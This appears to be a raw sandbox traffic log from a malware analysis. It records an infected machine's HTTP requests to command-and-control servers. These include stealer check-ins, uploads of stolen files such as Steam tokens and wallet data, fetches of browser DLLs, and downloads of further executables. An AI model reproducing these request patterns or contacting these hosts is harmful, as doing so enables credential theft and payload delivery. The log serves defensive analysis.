Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJEBKJEGHJKECAAKJKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="file"------BGHJEBKJEGHJKECAAKJK--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFHHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJEGIIEGIDGIDHJDAKFHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="message"wallets------FHJEGIIEGIDGIDHJDAKF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="message"files------IECBAFCAAKJDHJKFIEBG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="file"------BAKFCBFHJDHJKECAKEHI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGIDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 2d 2d 0d 0a Data Ascii: ------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="message"ybncbhylepme------DBKKKEHDHCBFIEBFBGID--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 2d 2d 0d 0a Data Ascii: ------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AAEBAKKJKKEBKFIDBFBA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 2d 2d 0d 0a Data Ascii: ------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AAEBAKKJKKEBKFIDBFBA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008250001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: /
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008251001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008252001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build"mars------KKFCAAKFBAEHJJJJDHIE--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008253001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: /Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------jbau9hxrAKydOQrcdExHrEData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6a 62 61 75 39 68 78 72 41 4b 79 64 4f 51 72 63 64 45 78 48 72 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 75 67 6f 76 6f 73 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 5e 60 88 fe 4e 09 17 a5 a7 dc 44 26 fb ed cb 02 93 cf 0e dc c4 da d5 7f c3 74 1a 04 39 a6 e6 1d 3f 20 7c 95 b4 6d 19 f3 6b 2f e8 83 d5 a0 f8 bc 02 96 ea 4e d9 4f 37 73 bd 18 3a 3a 16 47 dd c7 ad 68 89 d1 f9 4d 0c ab a7 84 87 8e 03 df c3 b1 7a bd 43 a5 99 d2 a3 48 ed e8 7d de 7a 1e 11 17 bf a0 fe 09 fb 2f 4d 16 02 95 41 76 88 a7 b0 2d d3 71 db ed db 75 6b c5 76 78 59 dc 6e 4e bd 3c 25 e9 40 f6 4d 1f 27 6d d9 20 81 fb 84 71 0e 9b d9 e1 d4 d5 59 79 1a 7f 7b 1b 28 d1 6a 68 bb c1 af 28 c4 8c ed bf d3 b8 c0 99 b6 1b 5a f1 d3 15 7b 80 03 45 87 78 fa e8 92 1a 6e dd 2a 86 d1 cc 6a 13 cf 2f 27 21 70 21 93 e8 f3 55 c7 f4 68 80 ab b3 39 a7 9c 50 68 53 25 87 cb 69 dd f3 93 a7 94 1a db 8f f1 55 b9 b5 8d 21 ce c7 32 63 55 d3 40 37 72 51 f4 70 90 5b 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6a 62 61 75 39 68 78 72 41 4b 79 64 4f 51 72 63 64 45 78 48 72 45 2d 2d 0d 0a Data Ascii: --------------------------jbau9hxrAKydOQrcdExHrEContent-Disposition: form-data; name="file"; filename="Wugovos.bin"Content-Type: application/octet-stream^`ND&t9? \|mk/NO7s::GhMzCH}z/MAv-qukvxYnN<%@M'm qYy{(jh(Z{Exn*j/'!p!Uh9PhS%iU!2cU@7rQp[--------------------------jbau9hxrAKydOQrcdExHrE--
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: /Content-Length: 71671Content-Type: multipart/form-data; boundary=------------------------m2QorkCQ39oPmNi0A2wAwLData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6d 32 51 6f 72 6b 43 51 33 39 6f 50 6d 4e 69 30 41 32 77 41 77 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 65 6b 65 63 69 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a cd 8c 43 f6 16 cd 5c 70 18 01 b0 02 12 ca 82 82 08 07 03 8e f5 12 42 0e 66 82 40 2a 2c dd c9 1d 43 8a 9c 74 71 a3 cd c6 4d b1 8d 23 fc a5 8a ef 80 3a 10 68 cf 5f 29 0d 83 d0 a2 93 86 2b 69 df 25 d5 8e 67 53 d0 3f d3 87 a9 e0 a8 2c 71 c6 f8 5a 51 3b e7 c4 ee 7c 5a e1 6b 7b b7 05 8a 28 74 70 17 06 74 73 a9 ae 01 60 27 cc 36 21 9a 41 41 c1 e3 b1 88 f6 97 25 b3 ef f8 4c f6 ca a6 8f 34 1b 27 99 46 5c c4 00 bf 1d 36 d6 b7 57 e2 05 10 dc 18 35 df 9e 26 ae 37 25 db eb 26 5b 75 87 74 22 c9 33 cc 57 92 a7 a8 71 03 93 37 2e bf 30 73 a7 d0 11 33 47 0f 37 92 74 86 a2 77 53 ae 73 68 4b fa f2 c7 da 0a 4f 52 66 c2 05 a4 b3 01 c5 ee b6 ab a1 65 de f1 f1 03 9a 67 2f 4e 84 7b e0 f6 96 ba 0f eb 91 a6 bc 4d 5d d0 d0 53 f9 c3 2c ba ef 48 b7 fa ba d5 aa 14 dd 29 a0 a7 4a 51 1b bd 14 57 c1 2e 8e 19 32 69 84 82 d4 e0 ad 1d 50 05 c8 b3 f9 5a 34 79 19 90 a8 f2 94 45 28 17 14 9a 4a a8 63 87 82 6c de 0f 88 00 e1 de df 41 eb e9 1a 14 41 7d ee 18 70 f8 1b d2 93 56 bd 5f 85 fe 37 aa 70 ed 6c 99 f3 ed ba bf 85 ff 99 88 af 6e eb 44 70 0b 88 1a 66 a0 be f9 36 c6 ed 2c 7f b8 db 12 f2 ef 6e 00 db 44 49 89 38 e9 87 07 3f 25 b5 f9 c3 e8 7a 1a 95 62 b9 09 50 54 aa 27 08 58 b8 06 3f 66 ca 9b 8b 99 21 3a a4 69 d7 c5 f6 2e 00 2f 77 39 56 f2 b1 79 42 38 23 e0 ab 85 b7 c5 0a b9 a6 46 e4 40 26 71 86 79 c1 bc ac 43 82 b8 f9 17 a6 a5 bb d9 65 ae 60 02 43 94 20 95 0b 0b f9 21 8f 95 cd 7b 88 62 c8 c9 c0 d3 59 28 94 b3 1b 71 dc 62 d8 06 9e 9d 29 51 aa 97 b8 2f f9 60 42 11 1c 96 3c 77 c1 ce 64 81 1f 60 42 4b 94 84 4c e8 72 d4 52 bb 1e cc fe d5 1f b9 4a 14 40 9a 5a 9a 1d 65 69 9c 32 c0 8d 94 b2 46 cf 57 a2 92 f0 41 10 77 3f 94 4b 77 3d e6 fe be b0 09 78 e5 a5 ca 16 c4 72 81 a8 6d d0 3a df 47 24 c2 53 76 80 b5 de 9e 8c 4d 5d 4c b2 13 06 2a 1f 97 62 39 18 32 f1 2e e3 be a9 42 ab b4 14 c4 3b 09 7c 91 30 0a 42 07 39 5d 8f 4e 31 83 b5 c7 40 58 c3 59 6b 2c 2d e9 ba b8 4a dd b3 72 a2 e4 1a 29 75 6a 71 16 72 69 39 af 7b 37 2b 49 9a 5f a9 0f 5d fa ec 02 f6 6a b1 af 3b 48 2f bb 1f c7 0f 8a ed 5f b7 4e d4 29 7a a1 01 5a 92 2d e9 42 32 d6 ca 9a 85 35 cf ea a4 46 5d f2 da be 36 d9 d6 2f df 3f 0d b0 e5 62 6e 38 51 6f 76 8c b5 32 2d 37 5b 95 e1 ed 11 08 0d 2e b1 82 af 66 9e 25 24 59 3b 00 97 3e cb 2f 82 79 2e fa e7 e1 00 36 cd 41 26 11 6d 8e e0 e8 d6 be 84 ad 42 ba bf 93 7c 95 9a 01 44 e9 5a 79 2e f8 77 f2 de 2a 53 3f 4d 42 3d 6e 1a 0d f5 32 6e 30 c0 fb
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008254001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 2d 2d 0d 0a Data Ascii: ------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="build"mars------IIJDBGDGCGDAKFIDGIDB--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
